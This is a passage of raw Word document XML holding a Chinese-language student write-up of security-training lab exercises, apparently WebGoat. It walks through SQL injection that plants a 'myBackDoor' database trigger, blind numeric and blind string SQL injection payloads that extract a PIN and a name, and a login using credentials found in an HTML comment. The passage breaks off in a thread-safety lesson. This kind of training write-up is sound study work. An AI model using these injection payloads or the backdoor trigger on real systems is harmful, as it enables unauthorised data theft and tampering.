            <wp:effectExtent l="0" t="0" r="1270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03-29 上午2.33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4D5" w14:textId="3F364BF3" w:rsidR="00007A5B" w:rsidRDefault="00007A5B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007A5B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645E6EB8" w14:textId="77777777" w:rsidR="00CD2940" w:rsidRDefault="008C4075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因為題目說</w:t>
      </w:r>
      <w:r w:rsidR="00CD2940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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CD2940">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>use the same technique</w:t>
      </w:r>
      <w:r w:rsidR="00CD2940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，所以我想也是加分號使空格中不只含有一個</w:t>
      </w:r>
      <w:r w:rsidR="00CD2940">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SQL statement</w:t>
      </w:r>
      <w:r w:rsidR="00CD2940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。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565BEA31" w14:textId="77777777" w:rsidR="00F3123D" w:rsidRDefault="00CD2940" w:rsidP="00087D60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在空格中輸入：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25309551" w14:textId="1F342F4C" w:rsidR="00087D60" w:rsidRPr="00087D60" w:rsidRDefault="00A41DCA" w:rsidP="00F3123D">
      <w:pPr>
        <w:ind w:left="480"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00087D60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101;</w:t>
      </w:r>
      <w:r w:rsidR="00087D60" w:rsidRPr="00087D60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email='john@hackme.com'WHERE userid = NEW.userid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE90B42" w14:textId="199AD866" w:rsidR="006B40C8" w:rsidRDefault="006B40C8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646C6E29" w14:textId="43114067" w:rsidR="006B40C8" w:rsidRDefault="006B40C8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即通過此關，而題目敘述有說由於此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db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不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support trigger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所以沒有成果截圖。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA2E7D6" w14:textId="77777777" w:rsidR="004130A2" w:rsidRDefault="004130A2" w:rsidP="00CF575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4AA4ED6F" w14:textId="55631A8D" w:rsidR="004130A2" w:rsidRDefault="004130A2" w:rsidP="004130A2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Blind Numeric </w:t>
      </w:r>
      <w:r w:rsidR="003309A8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SQL Injection</w:t>
      </w:r>
      <w:r w:rsidR="007F0A61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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C344326" w14:textId="4335BBEA" w:rsidR="00E10334" w:rsidRDefault="00E10334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E10334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753756E9" w14:textId="22C69B3D" w:rsidR="004B2CFC" w:rsidRDefault="004B2CFC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83E2A29" wp14:editId="3204F91E">
            <wp:extent cx="5270500" cy="1843405"/>
            <wp:effectExtent l="0" t="0" r="12700" b="1079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03-29 上午9.52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2DCA" w14:textId="451B8E2D" w:rsidR="006C6885" w:rsidRDefault="006C6885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6C6885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4D2A2E7C" w14:textId="0D8396B2" w:rsidR="006C6885" w:rsidRDefault="000E16CD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猜測</w:t>
      </w:r>
      <w:r w:rsidR="00D75186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後端</w:t>
      </w:r>
      <w:r w:rsidR="00D75186">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>function</w:t>
      </w:r>
      <w:r w:rsidR="00D75186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類似：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B9C473" w14:textId="77777777" w:rsidR="00D75186" w:rsidRDefault="00D75186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if( isValid(Account_Number) ){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E94BF90" w14:textId="7FABDE0C" w:rsidR="00D75186" w:rsidRDefault="00D75186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ab/>
      </w:r>
      <w:r w:rsidR="001D43D8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>print(“Account is valid”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C38EBB5" w14:textId="7657E0BA" w:rsidR="00D75186" w:rsidRDefault="00D75186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}</w:t>
      </w:r>
      <w:r w:rsidR="0034063A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74237031" w14:textId="09BA6002" w:rsidR="0034063A" w:rsidRDefault="0034063A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ab/>
        <w:t>print(“Invalid account number”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5711F0" w14:textId="245536C9" w:rsidR="0034063A" w:rsidRDefault="0034063A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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C761985" w14:textId="77777777" w:rsidR="006F0F50" w:rsidRDefault="006F0F50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77B5295F" w14:textId="35E94BA2" w:rsidR="008B3020" w:rsidRPr="00B26E38" w:rsidRDefault="006F0F50" w:rsidP="006F0F50">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000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若要測試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pin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 xml:space="preserve">，則使用 </w:t>
      </w:r>
      <w:r w:rsidRPr="006F0F50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>101</w:t>
      </w:r>
      <w:r w:rsidR="008B3020">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> AND</w:t>
      </w:r>
      <w:r w:rsidRPr="006F0F50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> ((SELECT pin FROM pins WHERE cc_nu</w:t>
      </w:r>
      <w:r w:rsidR="00F73619">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>mber='1111222233334444') &gt; 1000</w:t>
      </w:r>
      <w:r w:rsidRPr="006F0F50">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BDCBB2" w14:textId="18415A70" w:rsidR="006F0F50" w:rsidRDefault="006223D4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等效於</w:t>
      </w:r>
      <w:r w:rsidR="00A8195B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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A8195B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>True AND (boolean)</w:t>
      </w:r>
      <w:r w:rsidR="00B26E38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，因為已知</w:t>
      </w:r>
      <w:r w:rsidR="00B26E38">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Account_Number = 101</w:t>
      </w:r>
      <w:r w:rsidR="00B26E38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是</w:t>
      </w:r>
      <w:r w:rsidR="00B26E38">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F03849D" w14:textId="079777B5" w:rsidR="00556273" w:rsidRDefault="000D1790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慢慢迭代縮小範圍得，</w:t>
      </w:r>
      <w:r w:rsidR="000B764A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pin = </w:t>
      </w:r>
      <w:r w:rsidR="00556273" w:rsidRPr="004F4D60">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2364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。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE36EFB" w14:textId="74F89209" w:rsidR="000A5624" w:rsidRDefault="000A5624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7F075349" wp14:editId="2BDF35E0">
            <wp:extent cx="5270500" cy="1829435"/>
            <wp:effectExtent l="0" t="0" r="1270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8-03-29 上午10.13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AFE" w14:textId="77777777" w:rsidR="000A5624" w:rsidRDefault="000A5624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23C007FA" w14:textId="31D48B6A" w:rsidR="000A5624" w:rsidRDefault="000A5624" w:rsidP="000A5624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Blind String SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A915E2" w14:textId="78393E40" w:rsidR="00052A25" w:rsidRDefault="00052A25" w:rsidP="00052A25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052A25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2CEF4968" w14:textId="0FAAC3A2" w:rsidR="00885297" w:rsidRDefault="00885297" w:rsidP="00052A25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51FDDEB" wp14:editId="4A945644">
            <wp:extent cx="5270500" cy="2265680"/>
            <wp:effectExtent l="0" t="0" r="1270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03-29 上午10.28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9A8F" w14:textId="32576DDE" w:rsidR="006E0ED6" w:rsidRDefault="006E0ED6" w:rsidP="00052A25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5F1EB8C2" w14:textId="437BA011" w:rsidR="006E0ED6" w:rsidRPr="006E0ED6" w:rsidRDefault="006E0ED6" w:rsidP="00052A25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一開始猜想</w:t>
      </w:r>
      <w:r w:rsidR="004B073A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指令會是長這樣</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670289B3" w14:textId="77777777" w:rsidR="003A471A" w:rsidRDefault="000A5624" w:rsidP="003A471A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A471A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>101 AND ((SELECT name FROM pins WHERE cc</w:t>
      </w:r>
      <w:r w:rsidR="003A471A" w:rsidRPr="003A471A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>_number='4321432143214321') = 'Kevin</w:t>
      </w:r>
      <w:r w:rsidRPr="003A471A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>' )</w:t>
      </w:r>
      <w:r w:rsidR="003A471A" w:rsidRPr="003A471A">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79521D1E" w14:textId="64353380" w:rsidR="000A5624" w:rsidRDefault="003A471A" w:rsidP="003A471A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但嘗試了幾個常見的名字以後果斷放棄，</w:t>
      </w:r>
      <w:r w:rsidR="006D52B7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覺得這樣嘗試究竟何年何月可以完成，於是我再重新看一次題目，發現題目有提及</w:t>
      </w:r>
      <w:r w:rsidR="006D52B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ASCII</w:t>
      </w:r>
      <w:r w:rsidR="006D52B7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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006D52B7">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r w:rsidR="006D52B7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，我推測應該會是</w:t>
      </w:r>
      <w:r w:rsidR="00E6372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取出</w:t>
      </w:r>
      <w:r w:rsidR="00A53D7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一個個</w:t>
      </w:r>
      <w:r w:rsidR="00A53D7E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r w:rsidR="00A53D7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比較</w:t>
      </w:r>
      <w:r w:rsidR="00D4346B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，得出一個個</w:t>
      </w:r>
      <w:r w:rsidR="00D4346B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>char</w:t>
      </w:r>
      <w:r w:rsidR="00D4346B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最後組成</w:t>
      </w:r>
      <w:r w:rsidR="00D4346B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidR="0088445A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。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2706A239" w14:textId="5026ADEA" w:rsidR="003D6F1C" w:rsidRPr="00FA0143" w:rsidRDefault="003D6F1C" w:rsidP="003A471A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA0143">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1</w:t>
      </w:r>
      <w:r w:rsidR="001760E0" w:rsidRPr="00FA0143">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, 1) = 'J</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA0143">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>' );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138CCBE1" w14:textId="448A363B" w:rsidR="00A87385" w:rsidRPr="003A471A" w:rsidRDefault="002A43F8" w:rsidP="003A471A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Ans : </w:t>
      </w:r>
      <w:r w:rsidR="00A87385">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ji</w:t>
      </w:r>
      <w:r w:rsidR="00024447">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="00250485">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7585A33C" w14:textId="09A58888" w:rsidR="00ED325E" w:rsidRDefault="00904E35" w:rsidP="00E1033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2E737CCF" wp14:editId="3A7B59D6">
            <wp:extent cx="5270500" cy="2299335"/>
            <wp:effectExtent l="0" t="0" r="12700" b="1206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03-29 上午10.41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75D5" w14:textId="656AAB98" w:rsidR="006C6885" w:rsidRDefault="00D13321" w:rsidP="00D13321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Discover Clues in the HTML</w:t>
      </w:r>
      <w:r w:rsidR="002E25F6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 </w:t>
      </w:r>
      <w:r w:rsidR="00903A1B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FAF7BB" w14:textId="2B707902" w:rsidR="00DA2C06" w:rsidRDefault="00DA2C06" w:rsidP="00DA2C06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DA2C06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3F212317" w14:textId="7CE1CC56" w:rsidR="00C44F3E" w:rsidRDefault="00C44F3E" w:rsidP="00DA2C06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D6904D6" wp14:editId="67E3056D">
            <wp:extent cx="5270500" cy="2726690"/>
            <wp:effectExtent l="0" t="0" r="1270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8-03-29 上午11.04.5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44B" w14:textId="4D4A1927" w:rsidR="00442182" w:rsidRDefault="00442182" w:rsidP="00DA2C06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6950D2BC" w14:textId="4EC6CE9B" w:rsidR="00256EDD" w:rsidRDefault="00256EDD" w:rsidP="00DA2C06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在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firefox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中點擊「檢測元素」</w:t>
      </w:r>
      <w:r w:rsidR="003B4CEA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，看到</w:t>
      </w:r>
      <w:r w:rsidR="003B4CEA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&lt;!--FIXME admin</w:t>
      </w:r>
      <w:r w:rsidR="00AA1B3B">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>:adminpw</w:t>
      </w:r>
      <w:r w:rsidR="006C66B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidR="003B4CEA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AC2B2B" w14:textId="5FDFF9B9" w:rsidR="009F4F54" w:rsidRPr="00256EDD" w:rsidRDefault="009F4F54" w:rsidP="00DA2C06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於事輸入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User Name : admin , Password : adminpw</w:t>
      </w:r>
      <w:r w:rsidR="004B18C6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，成功登入。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4F96AF" w14:textId="04311CAC" w:rsidR="000C6283" w:rsidRDefault="000C6283" w:rsidP="000C6283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6B25B565" wp14:editId="5F04148C">
            <wp:extent cx="5270500" cy="1915795"/>
            <wp:effectExtent l="0" t="0" r="1270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8-03-29 上午11.04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C7D" w14:textId="329A4F49" w:rsidR="00014994" w:rsidRPr="00F53E30" w:rsidRDefault="001C0249" w:rsidP="00F53E30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 w:rsidRPr="00F53E30">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Thread Safety Problems</w:t>
      </w:r>
      <w:r w:rsidR="004669E0" w:rsidRPr="00F53E30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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9447FB" w14:textId="17930D26" w:rsidR="00F53E30" w:rsidRDefault="00F53E30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F53E30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47B61F67" w14:textId="0BE94815" w:rsidR="00755597" w:rsidRDefault="00755597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0F7F029B" wp14:editId="1DE6E620">
            <wp:extent cx="5270500" cy="1933575"/>
            <wp:effectExtent l="0" t="0" r="1270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8-03-29 上午11.20.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0921" w14:textId="4AD25409" w:rsidR="00755597" w:rsidRDefault="00755597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78C86378" w14:textId="7D18C907" w:rsidR="00667043" w:rsidRDefault="00667043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 w:rsidRPr="00667043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由於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我不了解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Thread Safety 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的原理於是我先去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google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一下。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C21CA9C" w14:textId="77777777" w:rsidR="00667043" w:rsidRDefault="00667043" w:rsidP="00667043">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17239BEE" w14:textId="44EE5204" w:rsidR="00667043" w:rsidRDefault="00667043" w:rsidP="00667043">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>「</w:t>
      </w:r>
      <w:r w:rsidRPr="00667043">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>但我們知道</w:t>
      </w:r>
      <w:r w:rsidRPr="00667043">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00667043">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>變數，在程式中如果要操作，應該要進行</w:t>
      </w:r>
      <w:r w:rsidRPr="00667043">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>lock</w:t>
      </w:r>
      <w:r w:rsidRPr="00667043">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>來避免有其他</w:t>
      </w:r>
      <w:r w:rsidRPr="00667043">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00667043">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>同時存取這個變數，但如果你沒做，你就會發現在使用人數較多的</w:t>
      </w:r>
      <w:r w:rsidRPr="00667043">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="00667043">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>系統上，異常的錯誤就會出現，而且很容易引導你朝向錯誤的方向去找這個問題，你可能會以為是多人連線造成系統錯誤，又或者其他怪問題</w:t>
      </w:r>
      <w:r w:rsidRPr="00667043">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>(EX:</w:t>
      </w:r>
      <w:r w:rsidRPr="00667043">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>兩個</w:t>
      </w:r>
      <w:r w:rsidRPr="00667043">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00667043">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:cs="MS Mincho"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>相繼讀寫同一個</w:t>
      </w:r>
      <w:r w:rsidRPr="00667043">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="00667043">
        <w:rPr>
